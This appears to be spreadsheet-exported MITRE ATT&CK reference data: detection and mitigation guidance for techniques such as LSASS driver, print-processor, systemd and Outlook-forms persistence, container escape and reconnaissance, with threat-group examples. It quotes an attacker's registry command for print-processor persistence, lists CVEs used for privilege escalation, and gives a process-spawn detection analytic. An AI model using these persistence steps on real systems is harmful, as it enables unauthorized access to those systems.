For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)
Ruler
[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Rules to establish persistence.(Citation: SensePost Ruler GitHub) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Utilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA.
File Creation
Monitor newly constructed files that may modify or add LSASS drivers to obtain persistence on compromised systems.
File Modification
Monitor for changes made to files that may modify or add LSASS drivers to obtain persistence on compromised systems.
Module Load
Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)
Credential Access Protection
On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)
Privileged Process Integrity
On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\RunAsPPL&lt;/code&gt; to &lt;code&gt;dword:00000001&lt;/code&gt;. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance. 
Restrict Library Loading
Ensure safe DLL search mode is enabled &lt;code&gt;HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\SafeDllSearchMode&lt;/code&gt; to mitigate risk that lsass.exe loads a malicious code library. (Citation: Microsoft DLL Security)
Pasam
[Pasam](https://attack.mitre.org/software/S0208) establishes by infecting the Security Accounts Manager (SAM) DLL to load a malicious DLL dropped to disk.(Citation: Symantec Pasam May 2012)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Creation
Monitor newly constructed files that may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
Module Load
Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
OS API Execution
Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor)
Windows Registry Key Modification
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Suspicious systemd services can also be identified by comparing results against a trusted system baseline. Malicious systemd services may be detected by using the systemctl utility to examine system wide services: &lt;code&gt;systemctl list-units -–type=service –all&lt;/code&gt;. Auditing the execution and command-line arguments of the 'systemctl' utility, as well related utilities such as &lt;code&gt;/usr/sbin/service&lt;/code&gt; may reveal malicious systemd service execution.
File Creation
Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links
File Modification
Systemd service unit files may be detected by auditing file creation and modification events within the &lt;code&gt;/etc/systemd/system&lt;/code&gt;, &lt;code&gt;/usr/lib/systemd/system/&lt;/code&gt;, and &lt;code&gt;/home/&lt;username&gt;/.config/systemd/user/&lt;/code&gt; directories, as well as associated symbolic links
Process Creation
Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
Service Creation
Monitor for new constructed systemd services to repeatedly execute malicious payloads as part of persistence.
Service Modification
Analyze the contents of &lt;code&gt;.service&lt;/code&gt; files present on the file system and ensure that they refer to legitimate, expected executables.
Limit Software Installation
Restrict software installation to trusted repositories only and be cautious of orphaned software packages.
Privileged Account Management
The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. 
Restrict File and Directory Permissions
Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services.
User Account Management
Limit user access to system utilities such as `systemctl` to only users who have a legitimate need.
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)	
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has established persistence through the creation of a cryptocurrency mining system service using &lt;code&gt;systemctl&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has established persistence using a systemd service.(Citation: Fysbis Dr Web Analysis)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has started a monero service.(Citation: Unit 42 Hildegard Malware)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can be used to establish persistence using a systemd service.(Citation: GitHub Pupy)
RotaJakiro
Depending on the Linux distribution and when executing with root permissions, [RotaJakiro](https://attack.mitre.org/software/S1078) may install persistence using a `.service` file under the `/lib/systemd/system/` folder.(Citation: RotaJakiro 2021 netlab360 analysis)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) can copy a script to the user owned `/usr/lib/systemd/system/` directory with a symlink mapped to a `root` owned directory, `/etc/ystem/system`, in the unit configuration file's `ExecStart` directive to establish persistence and elevate privileges.(Citation: Lunghi Iron Tiger Linux)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
Monitor for unusual kernel driver installation activity that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.
File Creation
Monitor for newly constructed files that may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.
Module Load
Monitor for abnormal DLLs that are loaded by `spoolsv.exe`. Print processors that do not correlate with known good software or patching may be suspicious.  New print processor DLLs are written to the print processor directory.
OS API Execution
Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;.
Windows Registry Key Modification
Monitor Registry writes to &lt;code&gt;HKLM\SYSTEM\ControlSet001\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\\Driver&lt;/code&gt; or &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\\[Windows architecture]\Print Processors\\[user defined]\Driver&lt;/code&gt; as they pertain to print processor installations.
User Account Management
Limit user accounts that can load or unload device drivers by disabling &lt;code&gt;SeLoadDriverPrivilege&lt;/code&gt;.
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)
Gelsemium
[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in &lt;code&gt;C:\Windows\System32\spool\prtprocs\x64\winprint.dll&lt;/code&gt; to be loaded automatically by the spoolsv Windows service.(Citation: ESET Gelsemium June 2021)
PipeMon
The [PipeMon](https://attack.mitre.org/software/S0501) installer has modified the Registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors&lt;/code&gt; to install [PipeMon](https://attack.mitre.org/software/S0501) as a Print Processor.(Citation: ESET PipeMon May 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may modify plist files to automatically run an application when a user logs in.
File Modification
Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.
Disable or Remove Feature or Program
This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.
User Training
Holding the Shift key while logging in prevents apps from opening automatically.(Citation: Re-Open windows on Mac)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may abuse SQL stored procedures to establish persistent access to systems. On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.
Audit
Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made. 
Code Signing
Ensure all application component binaries are signed by the correct application developers. 
Privileged Account Management
Do not allow administrator accounts that have permissions to add component software on these services to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems. 
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used various MS-SQL stored procedures.(Citation: Dragos Crashoverride 2018)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) used xp_cmdshell to store and execute SQL code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
 Monitor for third-party application logging, messaging, and/or other artifacts that may abuse Microsoft Outlook forms to obtain persistence on a compromised system. SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Command Execution
Monitor executed commands and arguments that may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms)
Process Creation
Monitor newly executed processes that may abuse Microsoft Outlook forms to obtain persistence on a compromised system.
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)
Update Software
For the Outlook methods, blocking macros may be ineffective as the Visual Basic engine used for these features is separate from the macro scripting engine.(Citation: SensePost Outlook Forms) Microsoft has released patches to try to address each issue. Ensure KB3191938 which blocks Outlook Visual Basic and displays a malicious code warning, KB4011091 which disables custom forms by default, and KB4011162 which removes the legacy Home Page feature, are applied to systems.(Citation: SensePost Outlook Home Page)
Ruler
[Ruler](https://attack.mitre.org/software/S0358) can be used to automate the abuse of Outlook Forms to establish persistence.(Citation: SensePost Ruler GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Container Creation
Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. 
Kernel Module Load
Monitor for the installation of kernel modules that could be abused to escape containers on a host.
OS API Execution
Monitor for unexpected usage of syscalls such as `mount` that may indicate an attempt to escape from a privileged container to host. 
Process Creation
Monitor for process activity (such as unexpected processes spawning outside a container and/or on a host) that might indicate an attempt to escape from a privileged container to host. 
Volume Modification
Monitor cluster-level (Kubernetes) data and events associated with changing containers' volume configurations.
Application Isolation and Sandboxing
Consider utilizing seccomp, seccomp-bpf, or a similar solution that restricts certain system calls such as mount. In Kubernetes environments, consider defining Pod Security Standards that limit container access to host process namespaces, the host network, and the host file system.(Citation: Kubernetes Hardening Guide)
Disable or Remove Feature or Program
Remove unnecessary tools and software from containers.
Execution Prevention
Use read-only containers, read-only file systems, and minimal images when possible to prevent the running of commands.(Citation: Kubernetes Hardening Guide) Where possible, also consider using application control and software restriction tools (such as those provided by SELinux) to restrict access to files, processes, and system calls in containers.(Citation: Kubernetes Security Context)
Privileged Account Management
Ensure containers are not running as root by default and do not use unnecessary privileges or mounted components. In Kubernetes environments, consider defining Pod Security Standards that prevent pods from running privileged containers.(Citation: Kubernetes Hardening Guide)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has deployed privileged containers that mount the filesystem of victim machine.(Citation: Intezer TeamTNT September 2020)(Citation: Aqua TeamTNT August 2020)
Doki
[Doki](https://attack.mitre.org/software/S0600)’s container was configured to bind the host root directory.(Citation: Intezer Doki July 20)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool that can break out of containers. (Citation: Unit 42 Hildegard Malware) 
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can gain a reverse shell on a host node by mounting the Kubernetes hostPath.(Citation: Peirates GitHub)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) maps the host’s C drive to the container by creating a global symbolic link to the host through the calling of &lt;code&gt;NtSetInformationSymbolicLink&lt;/code&gt;.(Citation: Unit 42 Siloscape Jun 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Driver Load
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery. Consider monitoring for the presence or loading (ex: Sysmon Event ID 6) of known vulnerable drivers that adversaries may drop and exploit to execute code in kernel mode.(Citation: Microsoft Driver Block Rules) Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges.
Process Creation
Monitor for newly executed processes that may exploit software vulnerabilities in an attempt to elevate privileges.
Note: Event IDs are for Sysmon (Event ID 1 - process create) and Windows Security Log (Event ID 4688 - a new process has been created). The Analytic is oriented around looking for an invocation of either spoolsv.exe or conhost.exe by a user, thus alerting us of any potentially malicious activity. A common way of escalating privileges in a system is by externally invoking and exploiting these executables, both of which are legitimate Windows applications. 
&lt;h4&gt; Analytic 1 - Unusual Child Process for spoolsv.exe or connhost.exe &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  (exe =="C:\Windows\System32\spoolsv.exe" OR 
   exe =="C:\Windows\System32\conhost.exe") AND
   parent_image_path == "C:\Windows\System32\cmd.exe")&lt;/code&gt;
Application Isolation and Sandboxing
Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Execution Prevention
Consider blocking the execution of known vulnerable drivers that adversaries may exploit to execute code in kernel mode. Validate driver block rules in audit mode to ensure stability prior to production deployment.(Citation: Microsoft Driver Block Rules)
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software components targeted for privilege escalation.
Threat Intelligence Program
Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization.
Update Software
Update software regularly by employing patch management for internal enterprise endpoints and servers.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) abused named pipe impersonation for privilege escalation.(Citation: Mandiant APT41)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has exploited CVE-2014-4076, CVE-2015-2387, CVE-2015-1701, CVE-2017-0263 to escalate privileges.(Citation: Bitdefender APT28 Dec 2015)(Citation: Microsoft SIR Vol 19)(Citation: Securelist Sofacy Feb 2018)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2021-36934 to escalate privileges on a compromised host.(Citation: ESET T3 Threat Report 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used CVE-2016-7255 to escalate privileges.(Citation: FireEye APT32 May 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a publicly available exploit for CVE-2017-0213 to escalate privileges on a local system.(Citation: FireEye APT33 Guardrail)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has exploited CVE-2021-1732 for privilege escalation.(Citation: DBAPPSecurity BITTER zero-day Feb 2021)(Citation: Microsoft CVE-2021-1732 Feb 2021)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used exploits to increase their levels of rights and privileges.(Citation: Group IB Cobalt Aug 2017)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.(Citation: FireEye FIN6 April 2016)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has exploited the CVE-2016-0167 local vulnerability.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation.(Citation: MSTIC DEV-0537 Mar 2022)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has exploited CVE-2021-1732 to execute malware components with elevated rights.(Citation: MoustachedBouncer ESET August 2023)
PLATINUM
[PLATINUM](https://attack.mitre.org/groups/G0068) has leveraged a zero-day vulnerability to escalate privileges.(Citation: Microsoft PLATINUM April 2016)
Scattered Spider
[Scattered Spider](https://attack.mitre.org/groups/G1015) has deployed a malicious kernel driver through exploitation of CVE-2015-2291 in the Intel Ethernet diagnostics driver for Windows (iqvw64.sys).(Citation: CrowdStrike Scattered Spider BYOVD January 2023)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used CVE-2014-6324 and CVE-2017-0213 to escalate privileges.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Profero APT27 December 2020)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has exploited CVE-2019-0803 and MS16-032 to escalate privileges.(Citation: TrendMicro Tonto Team October 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has exploited vulnerabilities in the VBoxDrv.sys driver to obtain kernel mode privileges.(Citation: Unit42 AcidBox June 2020)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has used an open-source tool to exploit a known Windows privilege escalation vulnerability (CVE-2016-0051) on unpatched computers.(Citation: Symantec Whitefly March 2019)	
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has exploited CVE-2017-0005 for local privilege escalation.(Citation: Check Point APT31 February 2021)
Carberp
[Carberp](https://attack.mitre.org/software/S0484) has exploited multiple Windows vulnerabilities (CVE-2010-2743, CVE-2010-3338, CVE-2010-4398, CVE-2008-1084) and a .NET Runtime Optimization vulnerability for privilege escalation.(Citation: ESET Carberp March 2012)(Citation: Prevx Carberp March 2011)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit vulnerabilities such as MS14-058.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Cobalt Strike Manual 4.3 November 2020)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398.(Citation: F-Secure The Dukes)
Empire
[Empire](https://attack.mitre.org/software/S0363) can exploit vulnerabilities such as MS16-032 and MS16-135.(Citation: Github PowerShell Empire)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used the BOtB tool which exploits CVE-2019-5736.(Citation: Unit 42 Hildegard Malware) 
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has exploited CVE-2007-5633 vulnerability in the speedfan.sys driver to obtain kernel mode privileges.(Citation: ESET InvisiMole June 2020)
JHUHUGIT
[JHUHUGIT](https://attack.mitre.org/software/S0044) has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.(Citation: ESET Sednit Part 1)(Citation: ESET Sednit July 2015)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement (DSE) protection and load its driver.(Citation: Trend Micro Iron Tiger April 2021)
PoshC2
[PoshC2](https://attack.mitre.org/software/S0378) contains modules for local privilege escalation exploits such as CVE-2016-9192 and CVE-2016-0099.(Citation: GitHub PoshC2)
ProLock
[ProLock](https://attack.mitre.org/software/S0654) can use CVE-2019-0859 to escalate privileges on a compromised host.(Citation: Group IB Ransomware September 2020)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) has a plugin to drop and execute vulnerable Outpost Sandbox or avast! Virtualization drivers in order to gain kernel mode privileges.(Citation: Kaspersky ProjectSauron Technical Analysis)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) has leveraged a vulnerability in Windows containers to perform an [Escape to Host](https://attack.mitre.org/techniques/T1611).(Citation: Unit 42 Siloscape Jun 2021)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Wingbird
[Wingbird](https://attack.mitre.org/software/S0176) exploits CVE-2016-4117 to allow an executable to gain escalated privileges.(Citation: Microsoft SIR Vol 21)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) has used a zero-day exploit in the ssh launchdaemon to elevate privileges and bypass SIP.(Citation: trendmicro xcsset xcode project 2020)
Zox
[Zox](https://attack.mitre.org/software/S0672) has the ability to leverage local and remote exploits to escalate privileges.(Citation: Novetta-Axiom)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Developer Guidance
Application developers uploading to public code repositories should be careful to avoid publishing sensitive information such as credentials and API keys.
Audit
Scan public code repositories for exposed credentials or other sensitive information before making commits. Ensure that any leaked credentials are removed from the commit history, not just the current latest version of the code.
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) researched Ukraine's unique legal entity identifier (called an "EDRPOU" number), including running queries on the EDRPOU website, in preparation for the [NotPetya](https://attack.mitre.org/software/S0368) attack. [Sandworm Team](https://attack.mitre.org/groups/G0034) has also researched third-party websites to help it craft credible spearphishing emails.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used LinkedIn to identify and target employees within a chosen organization.(Citation: ESET Lazarus Jun 2020)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has copied data from social media sites to impersonate targeted individuals.(Citation: Google EXOTIC LILY March 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Twitter to monitor potential victims and to prepare targeted phishing e-mails.(Citation: Malwarebytes Kimsuky June 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for vulnerabilities, tools, and geopolitical trends on Google to target victims.(Citation: KISA Operation Muzabi)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Developer Guidance
Application developers uploading to public code repositories should be careful to avoid publishing sensitive information such as credentials and API keys.
Audit
Scan public code repositories for exposed credentials or other sensitive information before making commits. Ensure that any leaked credentials are removed from the commit history, not just the current latest version of the code.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has searched public code repositories for exposed credentials.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
</t>
  </si>
  <si>
    <t xml:space="preserve">Network Traffic Content
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Disable or Remove Feature or Program
Remove or disable access to any systems, resources, and infrastructure that are not explicitly required to be available externally.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Volatile Cedar
[Volatile Cedar](https://attack.mitre.org/groups/G0123) has used DirBuster and GoBuster to brute force web directories and DNS subdomains.(Citation: ClearSky Lebanese Cedar Jan 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has purchased credentials and session tokens from criminal underground forums.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
APT28
[APT28](https://attack.mitre.org/groups/G0007) has performed large-scale scans in an attempt to find vulnerable servers.(Citation: TrendMicro Pawn Storm 2019)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has conducted widespread scanning of target environments to identify vulnerabilities for exploit.(Citation: Cybersecurity Advisory SVR TTP May 2021)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE 2021-44228).(Citation: CrowdStrike AQUATIC PANDA December 2021)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.(Citation: CISA AA20-296A Berserk Bear December 2020)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMicro EarthLusca 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 in Log4j and ProxyShell vulnerabilities; CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in on-premises MS Exchange Servers; and CVE-2018-13379 in Fortinet FortiOS SSL VPNs.(Citation: Check Point APT35 CharmPower January 2022)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has scanned network infrastructure for vulnerabilities as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.(Citation: Trend Micro TeamTNT)
Volatile Cedar
[Volatile Cedar](https://attack.mitre.org/groups/G0123) has performed vulnerability scans of the target server.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used contact forms on victim websites to generate phishing e-mails.(Citation: Google EXOTIC LILY March 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has searched for information on the target company's website.(Citation: KISA Operation Muzabi)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has conducted research against potential victim websites as part of its operational planning.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has searched victim's websites to identify the interests and academic areas of targeted individuals and to scrape source code, branding, and organizational contact information for phishing pages.(Citation: DOJ Iran Indictments March 2018)(Citation: Phish Labs Silent Librarian)(Citation: Proofpoint TA407 September 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) sent phishing messages via SMS to steal credentials.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) conducted credential theft operations to obtain credentials to be used for access to victim environments.(Citation: CrowdStrike StellarParticle January 2022)
